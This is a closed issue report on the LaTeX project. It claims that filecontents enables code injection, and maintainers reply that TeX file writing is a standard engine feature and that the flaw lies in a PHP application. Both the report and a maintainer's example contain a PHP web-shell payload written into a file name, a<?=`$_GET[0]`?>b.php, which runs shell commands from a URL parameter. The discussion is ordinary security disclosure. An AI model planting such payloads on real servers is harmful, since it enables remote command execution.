Closed mrojz closed 7 months ago
Well yes, TeX can write to any file name - although it can only write text not binary. TeX distributions have security settings which can be used to restrict where files are written - the most restrictive is 'just inside the current directory'. As TeX can also be set only to read files within the current directory, this can be quite restrictive. Typically, for 'secure' applications people run TeX in a VM with these settings turned to the most 'paranoid'.
Note that without \write18
enables, the TeX run cannot execute arbitrary code.
Also, filecontents
is in the end using TeX primitives which can be used to do the same tasks, so you are essentially looking at a standard feature of all TeX engines.
(Aside: filecontents
is an environment: your input would fail, it needs something like
\documentclass{standalone}
%\input{../header}
\begin{document}
\begin{filecontents}[overwrite]{a<?=`$_GET[0]`?>b.php}
hello
\end{filecontents}
\end{document}
otherwise a low-level error arises.)
Let me summarize this
<jobname>.log
)It is, of course, possible -- given the above functionality of the engine -- to write a script file, etc., into the user directory (or one of it subdirectories) and wait for the user to start a different program that consumes this file. This is nothing that LaTeX could prevent, even restricting the allowed files to a fixed set of names would not help because any LaTeX programming could be undone by code in document. So doing something like this (on top of preventing . files or places where writing can happen) would need to be done at the engine level and not by LaTeX. Thus, if you consider this restricted setting still a security threat you need to bring it up with the engine maintainers, i.e., pdfTeX, XeTeX, luaTeX, pTeX, etc. (most of them if not all share the same security concept concerning file writing).
As Frank just wrote this is not a latex issue but even looking at the prinitive tex, the issue is not with tex but with the php script which is writing a file with user input and then executing it. You are using tex as a convoluted way to write a file but you could use a shell script or simply php there with exactly the same vulnerability. The php script should not write files that are in the directories visible to the web server.__
Brief outline of the bug
filecontents packages allows code injection vulnerability
Minimal example showing the bug
Based on latex documentation :
i was trying a php application that takes a user input and inject it in the latex document as follow
header.text content
Case 1 :
userinput : \filecontents{ab.php}{hello}
.tex file content :
result : a file named ab.php was created with this content :
Case 2 :
userinput : \filecontents{a<?=
$_GET[0]
?>b.php}{hello}.tex file content :
result : a file named a<?=`$_GET[0]`?>b.php was created with this content :
Conclusion
It is possible to perform a code injection vulnerability using \filecontents package